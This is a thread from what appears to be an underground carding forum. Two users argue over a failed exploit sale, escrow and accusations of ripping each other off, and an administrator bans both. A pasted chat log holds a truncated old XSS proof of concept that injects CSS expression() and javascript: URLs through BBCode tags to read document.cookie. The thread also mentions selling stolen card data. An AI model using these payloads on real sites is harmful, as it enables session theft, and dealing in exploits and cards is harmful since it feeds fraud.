Депозит
0$
>>>ohhhh. lol read the forum rules carefully ESCROW is guarantee of payment.if you dont know how to use escrow then damn shit you have no right to stay here.

>>>these line you mention is earlier in chat.
>>>when i asked you. do you know coding? you did,nt replied

>>>then i sent codes. exactly helping notes( example)

>>> according to rules you have right reserve to Put me on blacklist if i received payment & ripped you. But payment not received. because you refused escrow as well as upfront. your demand was ist hand stuff.

>>>> I have offered this to WIDOWZ . dont know you either. and before deal done WIDOWZ banned.

>>>why you are threatening by mentioning i ripped you

You are sir retarded as fuck

Код:
[email protected]: show me proof

3:32:27 PM  
[email protected]: shouldnt be a problem for u

3:32:44 PM  
carder2012: ok

3:34:07 PM  
carder2012: sending a bit codes.

3:34:18 PM  
carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:

3:35:41 PM  
carder2012: you know coding?

I know code, and whats ur point about it, whats the difference if i can code or not?

I asked you for a proof and u copy/pased outdated exploit from exploit-db.

FAIL FAIL FAIL

carder2012

Новичок
Депозит
0$
I asked because after deal done. if you say this is not working or there is some problem Then better is to ask which things you know or not.

so you are predicting Fresh exploit without upfront or putting money in escrow.i am not psycho till now.

even you dont know how to deal. because if there is anything you want. you can decide whether you want it or not.

if you was true you never ignore escrow.as you mentioning you are selling cc. so why you dont know rules???

Депозит
0$
I asked because after deal done. if you say this is not working or there is some problem Then better is to ask which things you know or not.

so you are predicting Fresh exploit without upfront or putting money in escrow.i am not psycho till now.

even you dont know how to deal. because if there is anything you want. you can decide whether you want it or not.

if you was true you never ignore escrow.as you mentioning you are selling cc. so why you dont know rules???

jeesus u r so fucking retarded , i asked you for a proof, screenshot or anything, u said u r going to send some code, which was outdated exploit from exploit-db, now gtfo im done with wasting time on trash like you.

God

Администратор
Депозит
0$
You both was banned for 3 days.
Come here in 3 days and continue discussian in apropriate manner without all this dirty things and insultings.
Thank you.

TOR

Всегда заходите через браузер Тор, что бы быть вкурсе нового адреса после блокировки. Скачать можно по этой ссылке.

Время

Статистика форума

Темы
Пользователи
Новый пользователь
StarSum381
Сверху